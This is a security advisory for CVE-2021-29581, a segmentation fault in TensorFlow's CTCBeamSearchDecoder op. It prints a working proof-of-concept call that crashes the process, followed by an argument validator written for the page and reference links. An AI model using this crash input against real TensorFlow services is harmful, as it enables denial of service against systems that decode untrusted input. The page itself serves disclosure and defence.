CVE-2021-29581: Segfault in `CTCBeamSearchDecoder`
Due to a lack of input validation in `tf.raw_ops.CTCBeamSearchDecoder`, an attacker who controls the arguments of the op can trigger a denial of service via a segmentation fault. The following call, with an `inputs` tensor whose class dimension is zero and a `sequence_length` vector containing negative entries, reproduces the crash:
```python
import tensorflow as tf

# inputs is [max_time, batch_size, num_classes]; the last dimension is 0
inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32)
# one length per batch element; most of them are negative
sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100],
                              shape=[8], dtype=tf.int32)
beam_width = 10
top_paths = 3
merge_repeated = True

tf.raw_ops.CTCBeamSearchDecoder(
    inputs=inputs, sequence_length=sequence_length, beam_width=beam_width,
    top_paths=top_paths, merge_repeated=merge_repeated)
```
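The defensive counterpart of the advisory is to check the op's arguments before they reach the decoder. The validator below is an added example written for this page; it is not TensorFlow's code and not the upstream fix. The constraints it enforces (rank-3 `inputs`, strictly positive dimensions, one non-negative `sequence_length` entry per batch element that does not exceed `max_time`, and sane `beam_width`/`top_paths`) are the argument contract a caller should assume, and the function names `validate_ctc_inputs` and `POC_ARGS` are the example's own. It works on plain shapes and lists so it runs without TensorFlow installed; the sample values are those of the proof of concept above.

```python
from typing import List, Sequence


def validate_ctc_inputs(inputs_shape: Sequence[int],
                        sequence_length: Sequence[int],
                        beam_width: int,
                        top_paths: int) -> List[str]:
    """Return a list of contract violations; an empty list means the call is safe.

    inputs_shape is the [max_time, batch_size, num_classes] shape of `inputs`.
    (Assumed contract for the example; not the upstream validation code.)
    """
    problems: List[str] = []
    if len(inputs_shape) != 3:
        problems.append(
            f"inputs must be rank 3 [max_time, batch_size, num_classes], "
            f"got rank {len(inputs_shape)}")
        return problems  # the remaining checks need the three dimensions
    max_time, batch_size, num_classes = inputs_shape
    if max_time <= 0:
        problems.append(f"max_time must be positive, got {max_time}")
    if batch_size <= 0:
        problems.append(f"batch_size must be positive, got {batch_size}")
    if num_classes <= 0:
        # at least the blank label must exist; the PoC passes 0 here
        problems.append(
            f"num_classes must be positive (at least the blank label), got {num_classes}")
    if len(sequence_length) != batch_size:
        problems.append(
            f"sequence_length has {len(sequence_length)} entries, "
            f"expected batch_size={batch_size}")
    for b, length in enumerate(sequence_length):
        # negative lengths (as in the PoC) or lengths past max_time index out of the input
        if length < 0:
            problems.append(f"sequence_length[{b}] is negative: {length}")
        elif length > max_time:
            problems.append(f"sequence_length[{b}]={length} exceeds max_time={max_time}")
    if beam_width < 1:
        problems.append(f"beam_width must be >= 1, got {beam_width}")
    if top_paths < 1 or top_paths > beam_width:
        problems.append(
            f"top_paths must satisfy 1 <= top_paths <= beam_width, got {top_paths}")
    return problems


# Constructed sample: the exact arguments of the proof of concept above.
POC_ARGS = dict(
    inputs_shape=(18, 8, 0),
    sequence_length=[11, -43, -92, 11, -89, -83, -35, -100],
    beam_width=10,
    top_paths=3,
)

# Constructed sample: a well-formed call with the same batch geometry.
SAFE_ARGS = dict(
    inputs_shape=(18, 8, 5),
    sequence_length=[11, 18, 0, 11, 7, 3, 12, 18],
    beam_width=10,
    top_paths=3,
)


if __name__ == "__main__":
    for name, args in (("poc", POC_ARGS), ("safe", SAFE_ARGS)):
        found = validate_ctc_inputs(**args)
        print(f"{name}: {len(found)} violation(s)")
        for p in found:
            print("  -", p)
```

When TensorFlow is present, feed `tuple(inputs.shape)` and `sequence_length.numpy().tolist()` into `validate_ctc_inputs` and raise before calling the op if the list is non-empty; rejecting the call in Python keeps a malformed request from reaching native code at all, which is the behaviour you want on a service that decodes untrusted input.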
References
- github.com/advisories/GHSA-vq2r-5xvm-3hc3
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-509.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-707.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-218.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/b1b323042264740c398140da32e93fb9c2c9f33e
- github.com/tensorflow/tensorflow/security/advisories/GHSA-vq2r-5xvm-3hc3
- nvd.nist.gov/vuln/detail/CVE-2021-29581